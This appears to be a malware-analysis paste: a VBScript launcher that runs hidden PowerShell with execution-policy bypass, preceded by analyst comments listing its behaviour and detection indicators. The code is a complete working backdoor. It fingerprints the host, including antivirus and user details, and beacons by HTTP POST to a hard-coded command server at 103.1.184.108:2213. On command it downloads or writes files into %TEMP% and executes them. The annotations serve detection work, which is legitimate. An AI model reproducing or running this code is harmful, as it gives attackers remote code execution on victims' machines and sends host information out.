
Untitled

Racco42 Mar 20th, 2019 82 Never
  ' Analyst notes. Everything from "$spl" to the closing quote is the argument string of one O.Run call.
  ' Launcher: a WScript.Shell object runs powershell with -ExecutionPolicy Bypass -Command; the trailing
  '   ",0,false" arguments to Run request a hidden window and do not wait for the process to exit.
  ' info(): builds a backslash-separated host fingerprint prefixed 'Guest_': first logical-disk volume
  '   serial, machine name, user name, OS caption + architecture, the AntiVirusProduct displayName from
  '   root/SecurityCenter2, an empty field, YES/NO for the presence of
  '   %windir%\Microsoft.NET\Framework\v2.0.50727\vbc.exe, and TRUE/FALSE for the presence of HKCU:\vdw0rm.
  ' post(): sends an HTTP POST to http://103.1.184.108:2213/<cmdv> with the info() string as the
  '   User-Agent header and returns the response body as a string; any exception is swallowed after a
  '   3-second sleep, so failures leave no visible error.
  ' Main loop: requests 'Vre', splits $cmd[1] case-sensitively on 'ameer' into at most three parts
  '   ($T verb, $T1 URL or content, $T2 file name), acts on the verb, then sleeps 7 seconds and repeats.
  '   exc = download $T1 to %TEMP%\$T2 and start it; Sc = append $T1 as text to %TEMP%\$T2 and start it;
  '   Rn = write $T1 as bytes to %TEMP%\$T2 and start it; Up = same as Rn, then exit; Cl = exit.
  ' Detection pointers taken from this listing: powershell started with -ExecutionPolicy Bypass by a
  '   script host (presumably wscript.exe or cscript.exe - confirm from process telemetry); outbound HTTP
  '   POST to 103.1.184.108:2213; a User-Agent that begins 'Guest_' and contains backslashes; the
  '   HKCU:\vdw0rm registry key; files in %TEMP% that are started immediately after being written.
  ' NOTE(review): a VBScript string literal cannot span lines, so this layout looks reformatted for
  '   reading - confirm against the raw sample before building signatures on exact bytes.
  1. set O = CreateObject("Wscript.Shell")
  2.  
  3. O.Run "powershell -ExecutionPolicy Bypass -Command " & chrw(34) & "$spl = '\';
  4.  
  5. $vn = 'Guest';
  6. function info {
  7.   try {
  8.     $mch = [environment]::Machinename;$usr = [environment]::username;
  9.     $HWD = (Get-WmiObject Win32_LogicalDisk).VolumeSerialNumber;
  10.     $HWD = $HWD[0];
  11.     $wi = (Get-WmiObject Win32_OperatingSystem).Caption;
  12.     $wi = $wi + (Get-WmiObject Win32_OperatingSystem).OSArchitecture;$wi =$wi.replace('64-bit',' x64').replace('32-bit',' x86');
  13.     $av = (Get-WmiObject -Namespace 'root/SecurityCenter2' -Class 'AntiVirusProduct').displayname;
  14.     $e = $env:windir + '\Microsoft.NET\Framework\v2.0.50727\vbc.exe';
  15.     if (test-path $e) {
  16.       $nt = 'YES'
  17.     } else {
  18.       $nt= 'NO'
  19.     };
  20.     if (test-path 'HKCU:\vdw0rm') {
  21.       $usb = 'TRUE'
  22.     } else {
  23.       $usb = 'FALSE'
  24.     };
  25.     $u = $vn + '_' + $HWD + $spl + $mch + $spl + $usr + $spl + $wi + $spl + $av + $spl + $spl + $nt + $spl + $usb + $spl;
  26.     return $u
  27.   } catch {
  28.     Start-Sleep -s 3
  29.   }
  30. };
  31.  
  32. function post ($cmdv, $v) {
  33.   try {
  34.     $enc = [system.Text.Encoding]::UTF8;
  35.     $Req = [System.Net.HttpWebRequest]::Create('http://103.1.184.108:2213/' + $cmdv);
  36.     $Req.Method = 'POST';
  37.     $req.UserAgent = info;
  38.     [System.IO.Stream]$stm;
  39.     $stm = $Req.GetRequestStream();
  40.     $Y = $enc.GetBytes([byte][char]$V);
  41.     $Stm.Write($Y, 0, $Y.Length);
  42.     $stm.close();
  43.     $resp = $req.GetResponse().GetResponseStream();
  44.     $sr = New-Object System.IO.StreamReader($resp);
  45.     $v=$sr.ReadToEnd();
  46.     $sr.close();
  47.     return [string]$v
  48.   } catch {
  49.     Start-Sleep -s 3
  50.   }
  51. };
  52.  
  53. $infinite =$true;
  54. while($infinite) {
  55.   $cmd = @(post('Vre','').ToString());
  56.   $T,$T1,$T2 = $cmd[1] -csplit 'ameer',3;
  57.   if ($T -eq 'exc') {
  58.     try {(New-Object System.Net.WebClient).DownloadFile($T1, $env:temp + '\' + $T2);
  59.       [Diagnostics.Process]::Start($env:temp + '\' + $T2)
  60.     } catch {
  61.       Start-Sleep -s 3
  62.     }
  63.   };
  64.   if ($T -eq 'Sc') {
  65.     Try {
  66.       [IO.File]::AppendAllText($env:temp + '\' + $T2,$T1);
  67.       [Diagnostics.Process]::Start($env:temp + '\' + $T2)
  68.     } Catch {
  69.       Start-Sleep -s 3
  70.     }
  71.   };
  72.   if ($T -eq 'Rn') {
  73.     try {
  74.       $Gb = [system.Text.Encoding]::Default;[IO.File]::WriteAllBytes($env:temp + '\' + $T2,$Gb.GetBytes($T1));
  75.       [Diagnostics.Process]::Start($env:temp + '\' + $T2)
  76.     } catch {
  77.       Start-Sleep -s 3
  78.     }
  79.   };
  80.   if ($T -eq 'Up') {
  81.     try {
  82.       $Gb = [system.Text.Encoding]::Default;[IO.File]::WriteAllBytes($env:temp + '\' + $T2,$Gb.GetBytes($T1));
  83.       [Diagnostics.Process]::Start($env:temp + '\' + $T2);
  84.       exit
  85.     } catch {
  86.       Start-Sleep -s 3
  87.     }
  88.   };
  89.   if ($T -eq 'Cl') {
  90.     exit
  91.   };
  92.   $T = $null;
  93.   $T1= $null;
  94.   $T2 = $null;
  95.   Start-Sleep -s 7
  96. }"
  97.  
  98. & chrw(34),0,false